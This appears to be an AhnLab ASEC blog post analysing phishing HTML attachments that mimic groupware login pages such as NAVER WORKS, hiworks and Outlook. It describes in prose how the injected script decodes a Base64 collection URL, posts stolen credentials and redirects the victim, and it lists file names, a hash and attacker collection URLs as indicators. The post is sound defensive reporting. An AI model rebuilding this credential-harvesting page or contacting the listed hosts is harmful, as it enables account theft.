The ASEC analysis team introduced ‘phishing websites targeting Korean email service users’ last year May through the TI analysis report and ASEC blog post. The team showed back then how the attackers leaked user credentials targeting users of NAVER WORKS, MAILPLUG, hiworks, Chollian, and Daum.
Files that disguise themselves as company groupware login webpage to leak user account credentials are one of the common phishing types that have been distributed, with slight changes occurring in email title, content, name of the attached file, script code, etc.
Current attackers also disguise their files as the groupware products that Korean users use often, but this time they are using a simpler method of changing the name of the same script file to make it fit for each recipient. The team also found multiple files impersonating NAVER WORKS, hiworks, Microsoft Outlook, and Microsoft SharePoint by using similar script code formats.
The table below shows the name of the files that have been found so far and the date they were discovered. Most of the file names include company names and their types have various formats such as requests for quotation, purchase orders, contracts, and order forms. Among them, the two files are notable in that each changed the company name at least 5 times before they were distributed. Some files exist in VirusTotal Result, but as it was found that they were not detected by other companies at all, it is highly likely that users might mistake them as normal files.
For instance, the files that are distributed may have the same hash but different names, such as ‘** Science_positive request form.htm,’ ‘** Ecotech.htm,’ and ‘** Factory (Inc.) request for quotation.htm’. There have been also cases of script files with different hashes and similar formats being distributed with the same file name. The malicious part of the script will be discussed in more detail in the bottom part of this post.
File Name | Date | File Name | Date |
PO2648357.htm (Used an abbreviated form of Purchase Order, P.O) |
December 20th, 2021 December 22nd, 2021 |
** Ecotech.htm | January 26th, 2022 |
** Factory (Inc.) request for quotation.htm | December 24th, 2021 | authenticationsharepointazon.htm | January 11th, 2022 |
** Technology (Inc.) (order list.htm | December 28th, 2021 | (Inc.) ** Tech (inquiry for quotation).htm | December 20th, 2021 December 27th, 2021 January 19th, 2022 January 20th, 2022 |
** Industry (Inc.) contract.htm | January 4th, 2022 | ** Science_positive request form.htm | December 17th, 2021 January 23rd, 2022 |
** Industry. (order form).htm | January 19th, 2022 | (Inc.) ** request for quotation (20210608).htm | January 14th, 2022 January 25th, 2022 January 26th, 2022 |
DOC Q0017 3509.html | January 24th, 2022 | **** Technology (Inc.)(order form).htm | December 29th, 2021 January 4th, 2022 January 6th, 2022 |
When you open the HTML file attached in the phishing mail, you will find a login page impersonating one of various groupware as shown below. As it is difficult to distinguish between normal web pages and fake ones, users should take extreme caution.
Comparing the script code of the phishing file with that of NAVER WORKS normal login page in the text editor shows that the script code shown above is added to the bottom part.
The part that uses the JavaScript atob method has the variable d declared with the URL for stealing account credentials encoded with Base64. The code shows how the data is sent to the URL for leaking account credentials through the HTTP POST method when users enter their IDs and passwords. Also, for the part that uses windows.location.replace, the attacker makes the users redirect to the normal groupware webpage shown below so that they do not realize they have just visited phishing websites.
- https://worksmobile.com
- https://outlook.live.com/owa/
- https://mail.naver.com
- https://mail.office.hiworks.com/
The attacker differentiated URLs for leaking account credentials as shown below. It is likely that he or she did so to know which webpage the acquired account credentials were entered. In fact, there have been multiple reports of ngrok.io platform’s domains being used for phishing since last year.
- hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_naver.php
- hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_hiworks.php
- hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/wendiflaisher_worksmobile.php
As users might be confused because normal groupware images are used, they should still refrain from entering account credentials in webpages accessed by attached files of emails. If you received a suspicious email and are using the groupware mentioned in that email, it is recommended to check by logging in from the official groupware webpage through the web browser.
You should also update the anti-malware that you use to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious script files introduced in the post using the aliases below.
[File Detection]
Phishing/HTML.Generic.S1713
[IOC]
0ac973a960c95ac3e5bd1f474098f635
hxxps://no1webmaster.com/alvin.php
hxxps://supraenagy.ml/wan.php
hxxps://simcaadvertising.com/most.php
hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_naver.php
hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/jameshector0705_hiworks.php
hxxps://3a35-69-61-79-165.ngrok[.]io/gondor/wendiflaisher_worksmobile.php
hxxps://1749-185-38-142-187.ngrok.io/narnia/mekus_worksmobile.php
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Phishing Script Files Being Distributed by Impersonating Various Groupware appeared first on ASEC BLOG.
Article Link: Phishing Script Files Being Distributed by Impersonating Various Groupware - ASEC BLOG